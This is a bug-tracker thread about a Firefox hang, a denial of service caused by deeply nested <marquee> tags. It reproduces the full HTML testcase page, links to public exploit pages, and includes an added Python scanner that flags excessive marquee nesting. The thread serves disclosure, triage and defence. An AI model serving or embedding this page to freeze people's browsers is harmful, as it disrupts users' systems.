Dos problem with marquee tag

Reported by Vincenzo Ampolo on 2006-05-31
Affects: Mozilla Firefox; Status: Confirmed; Importance: Critical; Assigned to: (none)
Affects: firefox-3.0 (Ubuntu); Importance: Medium; Assigned to: Unassigned
Affects: firefox (Ubuntu); Importance: Medium; Assigned to: Unassigned

Bug Description

Hi,
as also reported on SecurityFocus at http://www.securityfocus.com/archive/1/435373/30/0/threaded, using this kind of HTML page:

<html>
<head>
<title>Credit to n00b..</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee>
</marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee>
</marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee>
</marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee>
</marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee>
</marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee>
</marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee>
</marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee>
</marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee>
</marquee></marquee></marquee></marquee>
</body>
</html>

Firefox uses all the CPU resources and it becomes unusable.
I've tested it in Ubuntu Dapper (upgraded from Flight 6) on amd64 (Firefox is at version 1.5.0.3).
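The testcase above is a pure nesting-depth problem: the document is well-formed, only absurdly deep. As an added example (not code from this report or from Mozilla), a small gateway-side scanner that measures <marquee> nesting depth with the standard-library HTMLParser, so a proxy or mail filter can flag such a page before a vulnerable renderer lays it out. The depth limit of 8, the function names and the constructed sample documents are my own assumptions.

```python
"""Flag HTML documents whose <marquee> nesting depth exceeds a policy limit.

Added example for this bug report, not code from the report or from Mozilla.
The limit below is an assumed policy value, not one taken from the report.
"""
from html.parser import HTMLParser

MAX_MARQUEE_DEPTH = 8  # assumed policy limit
# Void elements never get a closing tag; keep them off the stack.
VOID_ELEMENTS = {"br", "img", "meta", "link", "input", "hr", "area", "base"}


class NestingDepthScanner(HTMLParser):
    """Tracks the open-element stack and records the deepest <marquee> run."""

    def __init__(self):
        super().__init__()
        self.stack = []            # currently open element names
        self.marquee_depth = 0     # marquees currently open
        self.max_marquee_depth = 0
        self.marquee_count = 0

    def handle_starttag(self, tag, attrs):
        if tag in VOID_ELEMENTS:
            return
        self.stack.append(tag)
        if tag == "marquee":
            self.marquee_count += 1
            self.marquee_depth += 1
            self.max_marquee_depth = max(self.max_marquee_depth, self.marquee_depth)

    def handle_endtag(self, tag):
        if tag not in self.stack:
            return  # stray close tag: ignore, like a browser would
        # Pop back to the matching open tag (also closes unclosed children,
        # which covers marquees that are never closed at all).
        while True:
            popped = self.stack.pop()
            if popped == "marquee":
                self.marquee_depth -= 1
            if popped == tag:
                break


def scan_html(doc: str) -> dict:
    """Return nesting statistics and a verdict for one HTML document."""
    parser = NestingDepthScanner()
    parser.feed(doc)
    parser.close()
    return {"max_marquee_depth": parser.max_marquee_depth,
            "marquee_count": parser.marquee_count,
            "suspicious": parser.max_marquee_depth > MAX_MARQUEE_DEPTH}


def build_nested(depth: int, closed: bool = True) -> str:
    """Constructed sample mirroring the testcase: `depth` nested marquees."""
    body = "<marquee>" * depth + ("</marquee>" * depth if closed else "")
    return "<html><head><title>t</title></head><body>" + body + "</body></html>"
```

The unclosed variant (closed=False) models the other reported shape, where the marquee tags are never closed; the scanner reports the same depth for it.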

confirmed
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7b) Gecko/20040402 Firefox/0.8.0+

Created attachment 148963
Attached testcase

Same testcase as mentioned before.

It hangs on my computer too, but when I have JavaScript turned off, it doesn't hang.

I see this also in Mozilla1.7RC2

With a recent moz CVS trunk build all I see are JavaScript errors about too much recursion, no "hang". Fixed?

ok spoke too soon, will investigate

a slightly different testcase from bug 265027
https://bugzilla.mozilla.org/attachment.cgi?id=162508&action=view

no <dl>s just <marquee>s with huge height attributes.

I split the marquee hang from comment 6 into bug 288931 as it is very different

Ok, with current trunk build it doesn't hang anymore, it's just slow.
With Mozilla1.7, I hang, so something has definitely improved since then.

This is still an issue, confirmed with Firefox 1.5.0.3. Also, this issue has been posted to BugTraq (which is where I learned of it), so visibility is likely to soon rise.

A fix would really be a good thing.

Confirmed with Bon Echo using BugTraq example.

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1a3) Gecko/20060530 BonEcho/2.0a3

Created attachment 223870
BugTraq Testcase

Should have attached this to my last post.

Confirmed using testcase on WinXP SP1 w/ FF 1.5.0.3. I saw this on BugTraq, also. I'm surprised this hasn't been fixed yet...


*** Bug 339954 has been marked as a duplicate of this bug. ***

Using BugTraq test case.

Confirmed in:

Firefox Current Release -
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4

Mozilla Latest Nightly -
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050702

WFM in:

Firefox Latest Trunk Nightly -
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a1) Gecko/20060601 Minefield/3.0a1

Seems to be fixed in the trunk.

Confirmed for me in 1.5.0.4, WinXP/SP1.

Fixing up title for searching (added "nested", de-emphasizing DL tags), indicating relation to Bug #339954.

Original title: "hang when many <dl> and <marquee> tags are used. exponential time increase depending on number of <dl> tags.."

New title: "hang when many nested <marquee> tags are used. exponential time increase"

*** Bug 339954 has been marked as a duplicate of this bug. ***

Dup of bug 277208? (Which is fixed on trunk, btw)

Can confirm that the first Attached testcase still hangs 2.0.

David

David Farning (dfarning) wrote :

I still get this behavior as of firefox 2.0. Critical bug open upstream.

David

Changed in firefox:
status: Unconfirmed → Confirmed

Was there anything in this bug to make you think it was fixed for 2.0?
https://bugzilla.mozilla.org/page.cgi?id=etiquette.html

(In reply to comment #18)
> Dup of bug 277208? (Which is fixed on trunk, btw)
>

Definitely not. Testcase still kills the trunk.

(In reply to comment #21)
> Definitely not. Testcase still kills the trunk.

Oops, yes, it is now crashing current trunk builds, this is something new, I filed bug 363722 for it. This bug is for the hanging issue (which may return after bug 363722 gets fixed).

Changed in firefox:
status: Unknown → Confirmed

This seems to have been assigned a CVE, though not specific to firefox: CVE-2006-6954

Alexander Sack (asac) wrote :

confirmed upstream bug is 'In Progress' for us.

Changed in firefox:
assignee: nobody → mozillateam
status: Confirmed → In Progress
David Farning (dfarning) on 2007-02-24
Changed in firefox:
assignee: mozillateam → mozilla-bugs

There is another example (exploit) at the following link:

http://milw0rm.com/exploits/3606

The marquee tags are placed before the head tag.

... and earlier http://milw0rm.com/exploits/1867

CVE-2006-2723 is more appropriate, -6954 seems to be the Flock variant of the same thing.

It still happens quite frequently for me when opening certain myspace.com profiles. (with v2.0.0.11)

Thanks for the report, but please consider the Bugzilla etiquette guidelines before posting more "me too" comments in the future so that developers can more easily see the relevant information in a bug and so that people CCed to a bug (like myself) aren't needlessly spammed.
https://bugzilla.mozilla.org/page.cgi?id=etiquette.html

*** Bug 338474 has been marked as a duplicate of this bug. ***

*** Bug 432199 has been marked as a duplicate of this bug. ***

Alexander Sack (asac) on 2008-10-31
Changed in firefox:
assignee: mozilla-bugs → nobody
status: In Progress → Triaged
Changed in firefox-3.0:
importance: Undecided → Medium
status: New → Triaged
John Vivirito (gnomefreak) wrote :

This won't be fixed in Firefox 2.
I'm closing the other firefox task, since neither this bug nor upstream has been updated since 2007 and 2008.
2008 is more than a year ago.

Changed in firefox:
status: Triaged → Won't Fix
Changed in firefox-3.0:
status: Triaged → Won't Fix
Changed in firefox:
importance: Unknown → Critical